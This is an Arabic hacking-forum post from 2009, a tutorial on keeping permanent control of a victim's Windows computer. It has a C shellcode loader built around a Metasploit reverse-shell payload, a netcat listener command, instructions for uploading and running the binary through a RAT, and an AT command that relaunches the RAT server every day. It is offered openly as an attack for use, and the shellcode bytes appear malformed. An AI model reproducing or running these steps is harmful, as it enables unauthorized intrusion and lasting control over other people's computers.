الموضوع: عدم فقدان الضحية بطريقة جديدة و مميزة من اكتشافي عن طريق command AT
عرض مشاركة واحدة
قديم 06-06-2009, 08:51 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
d4rK-h4ck3r
 
الصورة الرمزية d4rK-h4ck3r
 

 
 
إحصائية العضو







d4rK-h4ck3r غير متواجد حالياً

إرسال رسالة عبر MSN إلى d4rK-h4ck3r

 

 

إحصائية الترشيح

عدد النقاط : 10
d4rK-h4ck3r is on a distinguished road
.................... عدم فقدان الضحية بطريقة جديدة و مميزة من اكتشافي عن طريق command AT

كالعادة درس اول مرة في المنتديات العربية و انا اعتزل الهاكر اذا يقولي واحد ان فيه درس مثله لذلك ارجوا ذكر اسم الكاتب عند النقل
اولا تعريف AT command
هي عبارة عن امر مرتبط بزمان محدد على سبيل المثال لو اردنا فتح
notepad في منتصف الليل
نفتح الدوس ونكتب الامر التالي
AT 00:00 /interactive "notepad.exe"
00:00 وقت تنفيذ الامر
/interactive يعني الامر يشتغل مرة واحدة لاحقا سوف نتطرق لكيفية تنفيذ الامر في اي يوم من الاسبوع و بصفة دورية
notepad.exe الملف الذي نريد فتحه
مثال ثاني
لو اردنا فتح المسنجر الساعة 3 عصرا نعمل الامر التالي
AT 15:00 /interactive "C:\Program Files\Windows
Live\Messenger\msnmsgr.exe"
ان شاء الله تكونوا فهمتوا
الان كيف سيساعدنا هذا الكلام
الطريقة هي اننا نرفع السيرفر و نعمل الكومند حتى ينفتح السيرفر يوميا يعني حتى لو فقدنا الضحية السيرفر سينفتح تلقائي و جينا التبليغ يوميا يعني ضحية للابد
لذلك نبدا بعمل كونكت للجهاز الضحية بالدوس عن طريق الشل كود
نبدا بعمل شل كود نشوف الموقع هذا
http://metasploit.com:55555/PAYLOADS...=win32_reverse
نعمل مثل في الصورة

ثم

نحفظ الكود و نستبدله بالجزء الملون في الكود التالي

#include <stdlib.h>
#include <string.h>
unsigned char shellcode[] =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x80"
"\x91\xc8\xad\x83\xeb\xfc\xe2\xf4\x7c\xfb\x23\xe0\ x68\x68\x37\x52"
"\x7f\xf1\x43\xc1\xa4\xb5\x43\xe8\xbc\x1a\xb4\xa8\ xf8\x90\x27\x26"
"\xcf\x89\x43\xf2\xa0\x90\x23\xe4\x0b\xa5\x43\xac\ x6e\xa0\x08"";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}
الان نحفظ الكود الجديد باسم
shellcode.c
حمل برنامج devc++
نصبه ثم افتح الملف الجديد سينفتح لك ببرنامج السي ++ اختار
Execute ==> compile
عندها تتكون عندك ملف تنفيذي اسمه shellcode
الان نذهب للدوس ونعمل الامر
cd\
ثم الامر
nc -l -v -p 21
عوض 21 بالبورت الذي اخترته ( يجب ان يكون لديك النت كات في :c )
ارفع سيرفرك في هذا المسار C:\WINDOWS
ارفع الملف التنفيذي في جهاز الضحية ببرنامج اختراقك و شغله
ستلاحظ ان الدوس اتصل به الضحية يعني تنفذ الاوامر من الدوس تبعك وتنفذ في جهاز الضحية
الان نفذ الامر التالي
الان نفذ الامر التالي في الدوس اللي مخترقين بيه الضحية
AT 23:30 /EVERY:m,t,w,th,f,s,su C:\WINDOWS\server.exe
m,t,w,th,f,s,su عوضها ب l,ma,me,j,v,s,d
اذا كان جهازك يدعم اللغة الفرنسية
استبدل 23:30 بالوقت الذي تريد تشغيل فيه السيرفر
نفترض ان الاتصال انقطع مع الضحية فان السيرفر سيشغل نفسه ذاتيا كل يوم الساعة 23:30 و مبروك عليك ضحية دائمة
اعرف ان الدرس صعب قليلا لذلك انا موجود لاي استفسار

greetz to : Password



u]l tr]hk hgqpdm f'vdrm []d]m , lld.m lk h;jahtd uk 'vdr command AT

التوقيع





DДЯk ĦДCkЄЯ
غائب لسنة كاملة بسبب الدراسة الجامعية

 

التعديل الأخير تم بواسطة d4rK-h4ck3r ; 06-06-2009 الساعة 09:07 PM.